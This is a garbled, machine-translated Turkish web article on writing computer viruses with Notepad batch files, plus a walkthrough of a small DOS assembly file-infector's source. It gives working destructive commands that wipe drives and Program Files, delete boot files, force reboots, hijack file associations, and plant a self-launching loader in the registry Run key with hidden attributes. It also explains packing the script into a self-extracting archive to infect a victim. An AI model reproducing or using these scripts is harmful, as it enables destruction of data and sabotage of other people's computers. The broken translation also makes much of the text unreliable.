işletim sistemi seçin

Bilgisayar virüsleri nasıl oluşturulur. Bir deftere basit bir virüs yazmak. virüsler nasıl oluşturulur

Bunlar, virüslerin nasıl yazıldığı hakkındaki bilgilere yalnızca virüs yazarlarının ihtiyaç duyduğunu düşünmeyin, nazik olun! İçin bilgisayar Güvenliği pis koku daha az önemli değil ve koristuvachları affedin. Bilgisayarı çeşitli yanlışlıklardan korumaya yardımcı olmak için bir dizüstü bilgisayara virüslerin nasıl yazılacağını anlamanın zirvesinde gezinin.

Eksen, bir sistem olsun, bir depoda bulunan harika bir not defterine yazan bir virüse benziyor. Microsoft Windows. Ama biliyorsunuz - buna virüs demek kolay, sadece sistem komutları, pis koku .bat formatında kaydedilir. Uzantıyı değiştirmek için sistemi ayarlamanız gerekir:

  • vіdkrivаєmo " bilgisayar«
  • Menünün en üstüne git " hizmet«, tisnemo ALT'ı göremiyorum
  • Bu menü için " hizmet»Öğe seç« Dosya seçenekleri«
  • " sekmesine git görüş»Bir puan arıyorum« Dosya türlerini kaydetmek için bir uzantı ekleyin«
  • Temizlemek sonraki öğeyi işaretleyin.

İlk bakışta, korkunç bir şey yok - sadece birkaç kısa kelime-komut. Ale on dіlі, yakscho bu dosyayı şununla yerleştir: sistem klasörü « system32\drivers\vb»Otomatik başlatmada yoga yazıyorum, böylece sistem meşgulken şarap başlıyor, ardından bilgisayarı yeniden başlattıktan sonra programı açmak veya çalışma masasından başka bir program seçmek mümkün olmayacak. Sistem kayıt defteriyle çalışmaya başlamanın bir yolu olmadığı için qi dii'yi tekrarlamanız önerilmez!

Telnetdrive.bat yerine çalıştırmak için güvenli komutlar girmeyi deneyin: Calc (hesap makinesi), Taskmgr (görev yöneticisi) veya Mspaint (boyama programı)

neden başlasın

Vivchiti küçük için saat geldi genel talimat bu tür dosyaların "hazırlanmasına" göre.

  • Önümüze bir defter açıyoruz;
  • Komut oraya getirilir, bu yüzden onu yeni bir "vücut" virüsünde yaratırız;
  • sayesinde işimizi kurtarıyoruz Dosya -> Yak'ı Kaydet;
  • Artık dosya uzantısını değiştiremezsiniz . txt Açık . yarasa Ve kurtarılan ismin vekili, muzaffer olacakmış gibi ihtiyacı yazın.

Basit bir virüs yazma ve bir dosyaya kaydetme. Şimdi, dosyadan kaydedilen virüsün gövdesinde neyin yazıldığını bilmek kötü.

Sıralamaya ilk satırdan başlayalım:

  1. @ Ekokapalı- komut olmadan, yazılan her şey monitörün ekranında asılı kalırdı.
  2. Tarih11.14- oluşturma tarihini belirtin.
  3. Eğervar olmakC:gökyüzü.yarasagitABC- C diskindeki tabanın sky.bat dosyasına yeniden doğrulanması ve bunu yapmanın bir yolu yok
  4. %0c:sk'yi kopyalay.bat- sky.bat'taki dosyanın adını değiştirerek kendiniz için çarpın
  5. Nitelik +HC:gökyüzü.yarasa- prihoє stvo dani dosyası yabancıların gözünde.
  6. EkoC:gökyüzü.yarasa >>otomatik yürütmeyarasa- virüs otomatik yüklemede kayıtlıdır.
  7. : ABC- yakscho vіn є, vikonannya programları buraya gelir.
  1. mdCRECK- İhtiyacım olan veya olmayan bir klasör oluşturuyorum, virüsün yaratıcısına hayret ediyorum.
  2. mdYENİ- bu tür klasörlerle tamamını kaydedebilirsiniz sabit disk koristuvach'ta.
  3. etiketE:LUZER- E mantıksal sürücüsünün adını yazın. Bu LUZER modunda.
  4. doç..exe=.exemp3- extension.exe, .mp olarak ilişkilendirilecek
  5. del c:Program Dosyaları /q- Kaldırılacak Program Dosyaları klasöründeki her şey.
  6. del*. */Q- virüsün bulunduğu katalogdan her şey kaldırılır, virüsün bulunduğu klasör kaldırılır.

Eğlendik, kanunu düşünün:

  1. del%0- virüsü doğru anlamak ve kendiniz görmek için.

Gerisini kaybettim, öğrenin, nasıl yoga yapılır. Sadece! Yardım için extension.bat dosyasını .exe olarak yeniden biçimlendirin WinRAR arşivleyici. Bir arşiv oluştururken - "SFX arşivleri oluştur" seçeneğini belirtin ve "Paketi açtıktan sonra Viconate" işaretini ayarlayın. Doğal olarak, virüsün altında yaratıldığı doğru adı gösterin.

feragatname

Bu makale gün ışığında yazılmıştır ve yazar, yaptığınız eylemlerden dolayı herhangi bir sorumluluk taşımamaktadır. Makul olun ve diğer insanları takdir edin.

Bilgisayar virüsleri nasıl oluşturulur | teorik bilgiler

Bilgisayar virüsleri- bir tür shkidlivy yazılımı, kendisinin bir kopyasını oluşturan ve diğer programların, sistem bellek alanlarının, zavantazhuvalny sektörlerinin koduna çeviren ve kopyalarınızı çeşitli iletişim kanalları aracılığıyla genişleten.

Bilgisayar virüsleri daha fazla sınıflandırmaya yol açabilir:

  • heyecan verici virüsler - içine nüfuz eden virüsler kazançlı sektör gibi veri tasarruflarının eklenmesi sabit diskler, Flash sürücüler, disketler vb. ve binalardaki dosyaların kullanılabilirliğine zarar verir.
  • dosya virüsleri- dosyaları sarmak için kullanılan (COM ve EXE uzantılı dosyalar) ve bunların işlevlerini olumsuz etkileyen virüs türleri.
  • Dosyaları yok eden virüsler- iki ileri virüs türünün işlevlerini birleştiren virüsler;
  • Belge virüsleri- ofis sistemlerinin dosyalarına bulaşan virüs türleri. Bu türe "makrovirüsler" de denir, virüslü sistemin parçaları, makro programlarının ek bulaşmasının arkasında bulunur.
  • Merezhev virüsü- virüs türü bilgisayar sistemi, Tobto merezhevyh hizmetleri ve protokolleri.

Dünyadaki en yaygın virüse ILOVEYOU adı verildi. Kendi sutty vin buv için kesinlikle sarsılmaz, bir solucan, insanlara bir tür spam gönderiyor. Ancak son zamanlarda buv'un ışığı siber saldırılara karşı cılız, sanki herkesin kendi güvenliğini düşünmesini sağlıyormuş gibi. WannaCry virüsüçok sayıda bilgisayara bulaşarak ve dünyadan 300 dolarlık bitcoinleri silerek. Ancak analistler, artık yeniden doğrulama olmadığının ve daha büyük ölçekte başka bir saldırı olacağının ve doğrudan Apple'a yöneltileceğinin farkındalar.

Ve yine de, WannaCry genişlemek ve birçok yeni kuruş kazanmak istiyor, alabileceğiniz WinLocker ile aynı. Sağda bankaların ve şirketlerin en çok ödediği şeyi halletmek için bir saatleri yoktu ve onlar için 300 dolar ciddi bir israf değil.

Sıcak virüsler yaratıyoruz ve sadece

Kendi virüsümüzün bir kopyasını oluşturalım, çünkü bilgisayarınızda kontrol etmenizi tavsiye etmiyorum, bu yüzden kötü sonuçlanabilir.

Bu tür virüsleri yaymak kesinlikle kösele olabilir, çünkü özel bir yazılıma vb. ihtiyacımız yok, sadece bir not defterine ihtiyacımız var.

Dosyamızı en önemli şekilde kaydedeceğimizi bir kez daha söyleyeceğim, .bat formatında olacağız, ben herhangi bir isim yazacağım ama siz kesinlikle verebilirsiniz.

tüm dosyaları görüntüle

Danimarka kodu anyname.bat gibi kaydediyoruz ve hepsi bu, lansmandan sonra tüm zaman kaldırılacak.

Mavi ekranölüm

@echo off %systemdrive%*. */f/s/q kapatma -r -f -t 00

Danca kodu anyname.vbs dosyasına kaydediyoruz, bu nedenle dosyanın biçiminin .bat değil .vbs olduğundan emin olun.

C, D, E sürücülerini üç saniyede biçimlendirin

rd/s/qD:
rd/sn/qC:
rd/s/qE:

Bu dosyayı anyname.bat gibi alın ve çalıştırın. Tüm diskler üç saniye içinde biçimlendirilecek.

Matris Etkisi | Matris Etkisi

@Eko kapalı
renk 02: hileler
yankı % rasgele %% rasgele %% rasgele %% rasgele %% rasgele %% rasgele %% rasgele %% rasgele
hilelere git

Anyname.bat gibi alın ve çalıştırın, PC'niz için güvenli değil.

PC'yi silin ve yeniden başlatmayı etkinleştirin

@echo kapalı öznitelik -r -s -hc: autoexec.bat del c: autoexec.bat öznitelik -r -s -hc: boot.ini del c: boot.ini öznitelik -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo kapalı Msg * SİZE ENFEKSİYON OLDU! Kapatma -s -t 7 -c "Bir virüs c'yi ele geçiriyor: Drive

Kind.bat gibi alın, PC'NİZDE GÜVENSİZ BİR ŞEKİLDE BAŞLATIN!

Dosyaları çalışmayanlarla değiştirin

Danimarka virüsü bu biçimi değiştirin (.exe .jpeg .png .mpeg .sys)

@echo kapalı assoc .txt = jpegfile

anyname.bat olarak seçin ve çalıştırın.

uzak işletim sistemi

@echo kapalı Del C: *. * | y

Anyname.bat gibi alın ve kurbanın bilgisayarında çalıştırın.

Ve şimdilik her şey, makaleyi okuduğunuz için teşekkür ederim ve alınan bilgilerle kötü olmayacağınıza ikna oldum. Daha fazla virüs istiyorsanız, lütfen yorumlara yazın! Makaleyi bilgisayarınıza kaydedin sosyal önlemler, Shchob harcamayın.

Hayatta ve sonuna kadar iyi şanslar!

"Uzun süre, ellenmemiş, sert bir pakette kıvrılın, titriyordu ve titriyordu, vücut titriyordu. Akıllıca değil, neden yogo, sadece biraz, dünyada göründükten sonra evden atıldı. .. Nareshti sıkıştı ve arşiv sayfasına yabancı ve kaba bir rozkriv priattachenny.Genç, cicavius ​​​​virüsü adını kapattı ve ilk dosyasını soydu ... "

Bu yazımda virüs yazmanın ispatını ekleyeceğim. Herhangi bir virüsün canlılığının temel ilkesi çıkartma sözleriyle ifade edilebilir: virüsün gövdesine bir kod gibi davranılır ve bulaşma saati bir haraç gibidir. Іsnuє zengin virüs türleri ve Farklı yollar enfekte. Doğal olarak, virüsün tam da belirli bir işletim sistemi biçiminde yatma mekanizması. E, örneğin, işlemcinin korumalı modunda çalışan virüsler (maksimum
ayrıcalıklar ve tüm belleğin mutlak adreslenmesi). AVP gibi bu tür şirketlerin bu tür kopyalara bakmak için çok fazla zamanı ve kaynağı vardır. Antivirüs yaratıcıları olarak çalışan tek şey, az sayıda gerçekten profesyonel virüslerdir.

Kendi başınıza nasıl virüs yazacağınızı öğrenmek için, birleştiricinin temellerini bilmeniz gerekir. Koçanın bilgisi ile en iyi virüsü yazmaya çalışabileceğinizi ve onu hemen yakalayabileceğinizi gözlemliyor olabilirim. Diğer zamanlarda, ama bazen gerekli,
başkalarının yarattıklarını görmek için kendi dünyanıza gelmeyi bilmek. Bu konulardaki kaynaklardan, kitap ve makale sayısının büyüklüğünün intikamını almak için bir taraf verebilirim:
http://vx.netlux.org/lib_rus.shtml.
Tüm її belgeleri makul ve erişilebilir bir şekilde yazılır
bana ait. Yani kendi kendini yönlendiren e-dergi Virüslü Ses. Yenisinin, yeni materyallerde (kaynaklar ve makaleler) gezinmenizi sağlayan kullanışlı bir navigasyon sistemi vardır. Bu dergi gün aşırı çıkmalı (önceki gibi olsun, hemen kapılmayın) ve bu alandaki tüm yeniliklerin intikamını almalı.

Herhangi bir virüsün kaynağını bilmeniz ve bunu yapmak istemeniz kabul edilebilir. Robiti nasıl? Dürüst olmak gerekirse, görünüşe göre ben de ilk kez böyle bir sorunla karşılaştım. Yemeğim şöyle oldu: metin bir virüs, bir şarap pratsyuє gibi hayret etmek istiyorum ve bu durumda YOGO'DAN KORKUYORUM! Her şey gerçek: Bu virüsü nasıl bulaştırabilirim ve CMOS'umu nasıl yakabilirim veya vidamı nasıl ovabilirim? Öneri: hiçbir şey. Yanlış işlerinizle, virüs size bir tür programlama için o Skoda'ya neden olabilir. Ancak, doğru olanların algoritması basittir. Yeni olana gidelim ve çözelim.

Virüsün kaynak kodunun çeviricide yazdığını göz önünde bulunduralım. Bu dil virüs yazmak için idealdir. Gördüğünüz gibi, içinde
derleyiciler ve yalnızca iki komut "gerçek" olarak adlandırılır
sabit diskte geri alınamaz değişiklikler veya başka bir gün) ce "INT" ve "OUT", diğer tüm komutlar işlemcinin kayıtları ve bayraklarla çalışır (bunu kabaca yapmak istiyorsunuz, ancak büyük rahunka için bu doğru). WIN API işlevlerini görmüyoruz, bu nedenle prensip olarak bunları DOS molasını değiştirmek için ve haftalık їx - komutu değiştirmek için kullanabilirsiniz.
"INT".

Uzun süredir ASMI'de yazmadıkları için yeni başlayanlar için önemli değil: "INT" komutu DOS veya BIOS'u sıfırlamak için kullanılır ve "OUT" komutu bağlantı noktasına veri yazmak içindir. Öyleyse, "INT" komutu için işlev numarası AH kaydında belirtilir (çoğunlukla) ve
AL, AX, EAX kayıtlarındaki "OUT" komutu için porta yazılan veriler kaydedilir.

Otzhe. Al, sahibi ol. Yani koçana gelince, DOS virüsünü çözmek gerekiyor.
kazan), sonra pidide be-ne Sahip: Borland Inc.'den Turbo Debugger, MicroSoft'tan CodeView, AFDPRO veya AVPUTIL. Dali, vladchik'teki zavantazh kaynağı pokrokovo izleme. Golovne dotrimuvatisya TILKI TEK KURAL. Yogo altın olarak adlandırılabilir.
UVAGA: cesurca göz kırpabilirsin çıkış kodu virüsünüz, ancak azıcık ulaştığınız komutlardan "OUT" veya "INT" hemen durup analize başlayın.

Aşağıdakileri analiz etmekle yükümlüsünüz:

  • yazma bağlantı noktasını yeniden denemek için aranan numara;
  • numara, işlev veya porta yazılacak veri tarafından istenir.

Bu ekiplerin gerçek eylemlerini öğrenmek için, Teknik Yardım'ı kazanın ya da Asma hakkında bilgi verdiğinizden emin olun ya da olun.
kitap. Golovne, dzherel'inizde her tür ve bağlantı noktası hakkında bilgi sahibi olmanın mümkün olduğunu.
Bu rütbede, çalışacağınızı anlayabilirsiniz.
bir ekip ilerliyor, bilgisayarlarında vikonavshi її değil. Aktarım saatini geçin, tüm verileri yazın (kayıt standı, komut adresleri, ilgili veriler
işlevlere yapılan çağrılar vb.) arşiv kağıdında. Fonksiyon çağırana (veya porta yazana kadar) tüm seçeneklere sahip olacaksınız ve komuta saldıracaksanız ne olacağını belirleyebilirsiniz. Yani kendisi size yardımcı olabilir eşler arası analiz sicil ve sancaklardaki değişiklikler.

Diğer takımın ("INT" veya "OUT") nasıl çalışacağını anlıyorsanız, onu atlayın ve şu ana kadar devam edin:
zstrіnesh k_nets dosyası yoksa böyle bir komuta saldıracağım. Sonuç olarak sahada bir virüs olup olmadığını yayarsınız ve bunu yoga işleyişinde çözersiniz.

Örneğe bir göz atalım. Bunun gibi küçük bir virüs aldım, "om. Infected Voice'un on birinci sayısından aldım" a. Yorum yapmadan Vіn buv var, bu yüzden tüm iş vikonati'nin kendisine oldu. ne ben
işimde berbattı: küçük bir kod bile, derlenmiş dosyaların küçük bir genişlemesi bile, cahil (ilk bakışta) bir algoritma. Axis yoga çıkış kodu (konuşmadan önce, REM22 olarak adlandırılır):

modeli minik
.kod
.başlatmak
başlangıç:
pop cx
merhaba:
xchg balta, bx
db 108h shr 1
db4eh; Aralık si
db 9eh shr 1
db 3ch; cmp al, xx
db 100h shr 1
db40h
fmask veritabanı "*.*", 0
losw
cwd
hareket dl, al
shl dx1
int 21h
jmp hel
son

Bence bu virüs bir başyapıt, bu yüzden bu kadar küçük bir rozmіrі ile bile
üreme mekanizmasını organize edin - deha gerçeğine göre bir robot. Hemen razbero olursak, ne ve nasıl soyuluruz, hepsi bu
yerinde dur. Bu arada, buna saygı duymalısınız: prensipte, bu virüs herhangi bir yıkıcı eylemde bulunmaz (bence çoğaltma bu şekilde yapılabilir), tüm dosyalara bulaşır.
bunlardan birinde katalaz. Bu "profesyonel" bir virüs değildir, bu nedenle yeni günde ciddi işler için tipik olan birçok mekanizma vardır:

  • günlük "kendi / yabancı" mekanizması (virüs ayrım gözetmeksizin herkese bulaşır, kendinize veya halihazırda virüs bulaşmış nesnelere bulaşır);
  • Birindeki yalnızca birkaç dosya virüslüdür (derlemeyi deneyin ve klasörde çalıştırın,
    hiç kimse :));
  • virüs polimorfik değildir (kendini şifrelemez ve kodunu değiştirmez);
  • virüs yıkıcı faaliyetler taşımaz;
  • virüs yerleşik değil.

içimize bir bakalım
üzerine yazar. Kaynak kodu, bir exe dosyası oluşturmak için kendi modelinizdir. ".Startup" bir TASM yönergesidir "ancak onsuz yapabilirsiniz veya" org 100h " yazıp ardından bir onay işareti koyabilirsiniz (i
kіntsi'de "bitiş"ten sonra ім'я etiketleri koyun). Reshta komutları herhangi bir kitapta kolayca bilinebilir ve soyma kokusuna hayret edin (yemin etmeyin). Sadece rozіbratisya kaldı, böylece takımlar evlilikte hemen sarsılabilir.

Danimarka başyapıtı, 6 kez tekrarlanan nihai döngüdür. Döngüde neler oluyor? Bir de altı farklı fonksiyonla (93, 4E, 3C, 40, 2E, 00) int 21h diyenler var. merak ediyor
sırayla şu anlama gelir:

"Pop cx" - cx'i sıfırlamak için tsіlki (yığının tepesinde, bildiğiniz gibi program sıfırın arkasındadır). Yeni? Ve SUB CH komutunda (sadece bakın, bu suçlu, ancak hata ayıklayıcıda zsuv 108h tarafından) CH = 01'i alın (zsuv 2Ah tarafından (burada PSP'de) FFh yalan söylemeye başlayın), o zaman vipendryuvatisya olacaksınız ve sadece sub ch, ffh, ale tse yaz programın kodunu değiştir ... Giriş yap:
*. *, 0 = alt CH , ama şimdi maske bir şaka için hazır ... AXIS OF DE dahi !!!

Tobto sub ch, ffh - tse "AE" (kintsi'de boşluk bulunan ASCII kodlarında). Ardından, her şey 101 kaydırmasından (kod 93) 10B kaydırmasına (kod 00) gider - int 21h İÇİN FONKSİYONLAR !!! Yani döngüler halinde söylediğimiz gibi (sayılarından daha fazlasını böl) 6 fonksiyon var ve bunu yaptığınızda çıkan kod sadece cicili bicili. Bende KESİNLİKLE HİÇBİR ŞEY YOK! BÖYLECE FONKSİYONLARI BİR SÖZLEŞMEDE TOPLAMAK OLACAKTIR. Tobto, eğer TANAT yazarsam, yine de bazı komutlar dizisine aktarılacak mı? Ale ce aslında veriler ... eğer bu programda - onlara isim vermezseniz, sadece int 21h, y ekseni için FONKSİYONLAR
dahiyane!!! Duyguyu söylemenin bir yolu yok - buna göre, altı döngünün cildinde bir işlev döngüsü var, peki, tüm kayıtlar yaklaşık olarak
pіdignany pіd іdeals ... Marvel:

İlk kez, 93h işlevinin adı: Boru (Hata) - orada programın kendisi için HİÇBİR NAVANTAJ OLMAYACAK, HİÇBİR ŞEY ÖLMEYECEK, SADECE SÜPER, GEREKMEZ, BU BİR GÖRÜNÜM DÖNGÜSÜ, ALE Z DAHİ KODUNA BAKIYORSANIZ SADECE İLERİ BAKIRSINIZ SOBI ONU GÖRÜYORUM, hiçbir yere gidemezsiniz !!! Böyle bir "canlı" işlev olacak - aşağıya bakın.

Arkadaş: 4Eh - eksen zaten ihtiyacınız olanla aynı! Dosyayı arayın ve dx'teki fitil anına kadar dosya maskesi değiştirildi (108h) !!!

Üçüncüsü: 3Ch - dosyanın oluşturulması. Tse sche one "leva" işlevi. Bizim için hiçbir şey yok. Bir dosya oluşturacak hiçbir şeyimiz yok (bu benim hatam olsa bile, ön uçta bildiğiniz o dosyaya kendinize yazmanız yeterli). DX'te bir leviy smittya gibi yatıyor, doğal olarak s
Dosyaya yazacak bir şeyim yok yani CF=1 ve bir sonraki döngüye geçiyoruz.

Dördüncü: 40h - Dosyaya yaz. Ve eksen zaten ihtiyacımız olanlardır! DX ofset zsv 100h (bu REM22'nin koçanı) ve CX ekseni troché hareketi - 400h'de, yani gerçekten bulunan dosyanın koçanı üzerinde
400h bayt yazarsanız, REM22 toplamda 22 bayt yer kaplar, yani 1002 bayt yazılır. Öyle olsun. Ama kodun dehasına bakacağım :), deneyebilirsiniz.

P'yata: 2Eh - Doğrulama İşaretini Ayarla. Tse SAMA SOL işlevi, işte burada - programın eki.

Shosta: 00h - programın dışında tse vyyavlyaєtsya (Bilmiyorum bile).

Eksen ve hepsi: böylece 6 döngüye sahip olabiliriz, bazı anlamlarda yalnızca 3: ara, kaydet ve çık.
Shvidshe hepiniz için her şeyden daha zengin olacaksınız
temizlemek. Shchob rozіratisya, vladchik'teki zavantazh kaynağı, yogo izle, hayret
kayıtlardaki tarihte, yorumlarıma bakın. O zaman her şey netleşecek. Sonunda
Kendim katlamamak için bir hata ayıklama tablosundan alıntı yapıyorum (bir kere, sanki suçluymuşsun gibi merak ediyorsun). Prensip olarak, kişi vistachit'ten suçludur,
bu virüsün içinde ne olduğunu anlamak için ama sanırım yorumlar açık olmayacak.

ADR KOD ASM 1 2 3 4 5 6
100 59 POP CX müşteri = 0 - - - - -
101 93 XCHG BALTA, BX AX=BX=0 AX=0, BX=9300h AX=9300h, BX=0 AX=0, BX=0005h AX=0005h, BX=0400h AX=0400h, BX=2E00h
102 84 4E 4F TEST B+4Fh,
CL		 - - - - - -
105 3C80 CMP AL,
80 saat		 - - - - - -
107 40 INC BALTA AX = 0001h AX = 0001h AX = 9301h AX = 0001h AX = 0006h AKS = 0401h
108 2A 2E 2A 00 ALT CH, B CX = 0100h CX = 0200h CX = 0300h CX = 0400h CX = 0500h CX = 0600h
10C AD LODSW (DS:SI->AX) AX=DS:
100 = 9359 saat		 AX=DS:
102 = 4E84h		 AX=DS:
104 = 3C4Fh		 AX=DS:
106=4080sa		 AX=DS:
108 = 2E2Ah		 AX=DS:
10A=002Ah
10D 99 CWD (DX=E(AX)) DX=FFFFh Dx = 0000h Dx = 0000h Dx = 0000h Dx = 0000h Dx = 0000h
10Ç 8A D0 MOV DL, AL DX=FF59h DX = 0084 saat DX=004Fh DX = 0080h DX=002Ah DX=002Ah
110 D1 E2 SHL DX, 1 DX=FEB2sa DX = 0108h DX=009Eh DX = 0100h DX = 0054h DX = 0054h
112 CD 21 İÇ 21sa AH = 93 (Boru) - Hata AH=4E
(İlk Bul)		 AH=3C(Dosya Oluştur) AH = 40 (Dosya Yaz) AH=2E(SetVerifyFlag) AH = 00 (Sonlandırma)
114 EB EB JMP KISA 101 ??? - - - ??? -

Şaşırtıcı değil ama sadece bilgisayar dehaları ve akıllı programların değil, aynı zamanda bir virüsün nasıl oluşturulduğuna dair bilgiler de var. zvichayny coristuvach kişisel bilgisayar. Bazı kötü niyetli kişiler, shkidlivy yazılım güvenliği oluşturma yolu ile shkodi kurbanları yapmaya hazır olduklarının farkındalar ve hepsinden önemlisi sibernetik karakteri oynamak yeterli değil. Üçüncü sistemlerin bilgisayarına sızma olsun yazılım güvenliği zengin ülkelerin yasalarına göre cezalandırılır. Bunlar hakkında bir makale verilir, virüsün nasıl yayılacağı, sadece koristuvach rozumiv olmak için galip gelebilirsiniz, nasıl olunur windows komutları NT.

virüs tarafından yaratıldı

Kendi bilgisayar virüsünüzü oluşturabilirsiniz, ayrıca bir cilt pochatkіvets koristuvach PC oluşturabilirsiniz. Kimler için programlama alanında bilgi sahibi olmak zorunlu değildir. Annenin bazhannya'sını bitirmek için, en basit komutlarda büyümek için üç boş saat ve tabii ki bir bilgisayar. Size "Notebook"ta nasıl virüs oluşturulacağını öğretebilirim. Bu durumda farklı tercümanlar olmadan çalışacağız, kodu geliştirme ortamının uzmanlığına yerleştirmeyeceğiz. Amaç ne verilen yöntem? Programımız (virüs), bir metin dosyasını toplu iş dosyasına dönüştürme yoluyla saldırıya uğrayacaktır. Windows dosyası uzantılı (* .bat). İlk lansmandan sonra, kötü dosyada belirttiğiniz gibi, tüm abonelikler kötü olacaktır. Artık teorik olarak bir virüsün nasıl oluşturulacağını biliyorsunuz, ardından bunlarla daha büyük bir sunum toplantısına geçebilirsiniz. Önünüze geçmek istiyorum ki, bu virüsler ciddi konuşmalar için tanınmaz. Pis koku bilgisayara zarar verse de, trajedinin ölçeği küçüktür. Kurbandan bilgi çal, görmüyorsun ama ona daha çok dikkat edelim. Size nasıl virüs yaratılacağını göstermenin zamanı geldi. Hangi raju için zastosovuvat komutunun nasıl yapıldığını öğrenmeniz gerekir. Windows yönetimi NT, bazıları daha ayrıntılı olarak açıklanacaktır. belli ki muhteşem Metin düzeltici Ve şu komutu yazıyoruz: @echo off.

Vіtayu, vikonannya'nın ekranını açtın. Artık virüsünüzün başlatılmasından sonra, kurbanın saldırıdan haberi yok kod, tüm sürecin gözlerle prihovaniya olacağı gerçeğine. uzakta yeni sıraşu kodu yazın: %SystemRoot% / system32 / rundll32 user32, SwapMouseButton > null.

Dış görünüm komutunu açıklamanın bir anlamı yok, ancak asıl mesele şu ki, farenizin düğmeleri ters sırada programlandı (düğmelerin ataması yer yer değiştirildi). Şimdi bu dosyayı kaydedin ve uzantınızı hatırlayın (*.txt yerine *.bat koyun). İşte bir Windows toplu iş dosyası, bir şey çalıştırırsanız fareniz düzgün çalışmaz. Virüs oluşturmanın ilk örneğini aldınız ve eğer size uygunsa, bu tür komutları oynamaya devam edebilir ve daha derine inebilirsiniz. Kurbanınızı ciddi bir şekilde özetlemek istiyorsanız, aşağıdaki satırları ekleyebilirsiniz:

taskkill /f/im explorer.exe > boş
kapatma -r -t 1 -c "lol" -f> boş

İlk satırda "explorer.exe" işlemini açarsınız ve sonraki satırda bilgisayarı yeniden başlatmanız yeterlidir. Göreviniz, virüsünüze yeni komutları yeni bir satıra eklemektir, bu nedenle dosyayı kaydedin ve uzantıyı unutmayın. Bir bilgisayar korsanı olabilirsiniz. Şimdi kurbanın dosyasını indirelim. Yarasa uzantılı bir dosya oluşturun ve önceden "Paketi açtıktan sonra Viconate" öğesini seçerek özel bir SFX arşivine yerleştirin. Artık kurbanın bilgisayarına arşiv açıldıktan sonra otomatik olarak cim virüsü bulaşacaktır. Sadece "hediyemiz" kayboldu.

Her şey icat edildi

Eksen şimdi sadece bisiklet bulmakla suçlanacak, güncellenen programlar ve bilgisayar korsanları gerçekten hayatımızı nasıl kolaylaştırdı? Açık erişim ile "Virus Generator" Kuzya "adlı programı kolayca tanıyabilirsiniz. Tüm komutları elle yazmanıza gerek kalmayacak. Sadece bir dosya seçmeniz yeterli ve program dosyayı sizin için bağımsız olarak oluşturacaktır. .

En basit virüslerin oluşturulması, programların geliştirilmesi için özel ortamların varlığını etkilemez. Ben özel bilgi, konuşmadan önce, tezh. Tıpkı birisi için bir komut satırını kazanmak gibi, virüs oluşturmak kolaydır. Sözdizimini bilmek kimin için gereklidir? Komut satırı Ve .bat dosyaları oluşturabilirsiniz.

.bat dosyası nedir ve onu nasıl oluştururum?

Daha da yüzeysel, sonra .bat uzantılı dosyalar. Bu tür dosyalar, Windows komut yorumlayıcısı tarafından yazılması nedeniyle komutlar taşır. Komut satırının en üstünde düzenlenebilen tüm komutlar bir .bat dosyasına girilebilir ve çalıştırılabilir. Sonuç aynı olacaktır.

Bir .bat virüsü oluşturmak için standart bir metin düzenleyiciye ihtiyacımız var. İdeal olarak bu amaçlar için Not Defteri. Yeni yaratıp yarattıktan sonra Metin belgesi, Oraya o kodu (komutu) girmeniz gerekiyor, örneğin vikonati suçlu. Şans eseri, ek bir menüye ihtiyacınız var Yak'ı kurtar bu dosyayı uzantılarla kendi adınıza ayarlayarak kaydedin .bat ve dosya türünün belirtilmesi Tüm dosyalar.

En basit virüsü biz yaratıyoruz

Bu yazıda, başlatıldıktan sonra her zaman komut satırını açacak olan bir virüsün yaratılmasına bakabiliriz. Neskіchenno ve duzhe shvidko vіdkrivayutsya vіkna komuta kademeleri koristuvachevі sakin pratsyuvati vermiyor. Hepsini kapatın, kimseyi yakalamayın ve yakında pis koku unutulacak operasyonel hafıza satırında bilgisayarın robotuna şiddetle iftira atan bilgisayar, tamamen donana kadar. Bunun gibi bir şey görünecek:

O zamana kadar virüsümüzü otomatik ilerlemeye sokacağız, neleri güvence altına alacağız otomatik başlatmaİşletim sistemi ile birlikte virüs.

Oluşturulan virüsün kodu

Cilt bakımı için bazı programcılar, bazı farklı çözümler üretilebilir. Böyle bir görevi yerine getirme yöntemlerimden birini vereceğim.

md c:\klasör
yankı başlangıcı c:\papka\virus.bat > c:\papka\virus.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
öznitelik+r+h+s c:\papka
öznitelik+r+h+s c:\papka\virus.bat
c:\folder\virus.bat'ı başlatın
del%0

Şimdi kodun kendisine bir göz atalım. İlk satır, adları olan bir klasör oluşturur dosya diskin kökünde C:/. Bu tür adresler yalnızca popo için sağlanır. Wikoristannya w kök klasörü C: / bilinmiyor garnitür seçeneği virüs için. Virüsünüz için iyi bir hayatta kalma sağlamak istiyorsanız, en iyisi onu koruyun. İlk komut, virüsün kendisini önceden oluşturulmuş dizine atmanız için başlatılabilir.

Başka bir satır bir dosya oluşturur c:\klasör\virüs.bat i, echo komutunun yardımı için yeni komutu girin c:\folder\virus.bat'ı başlatın. Burada > işaretinden sonra komutun yerinin ne olduğunu bilmek gerekir. Burada bilmeniz gerekenler: c:\klasör\virüs.bat ve є virüsün ana gövdesi. Bir seferde analiz edebileceğimiz bir kodla bir .bat dosyası oluşturuyoruz, bu sadece ana virüsümüzün yükleyicisidir. Virüs için başka bir isim ve başka bir yer kazanabilirsiniz.

Üçüncü sıra, yarattıklarımızı otomatik ilerlemede virüsün başka bir toplama gövdesine atar. Coristuvacha'nın ona erişebilmesi için kayıt defteri anahtarı olan coristuvach'ı kazanması gereken kişiler. Ve yönetici erişimine sahip olmamak mümkün olduğundan, bu bir af anlamına geleceğinden, bilgisayarın otomatik yüklenmesini geçersiz kılmak güvenli değildir.

Kodun dördüncü ve beşinci satırları, virüsün ve klasörün özniteliklerini değiştirerek virüsü siler. Verilen komutlar ve kimin için kazandığımız, nitelikler ekliyoruz Sadece Okuma, Ek ve Sistemі klasör için, і virüs için. Öznitelik wiki'si r (Sadece okuma) obov'azkovo değil. Bir eksen öznitelikleri Ataşman ve Sistem us virüsünün yarattıklarını korumak için iyi. İnanmıyorsanız, virüsle ilgili makaleyi okuyun, evet. Aynı teknolojiyi kazanmak.

Kodun 6. satırı virüsümüzü başlatır. İsterseniz bu adımı atlayabilirsiniz, böylece virüsün ilk lansmanı ancak bilgisayarı yeniden başlattıktan sonra olur.

І, nareshti, dur, 7. satır bunu gördü.bat-virüs. Buna değer, çünkü bu .bat dosyasını kullanarak oluşturduğumuz virüsü kolayca görebilir ve kaldırabilirsiniz.

Yaratılan virüs duygusu

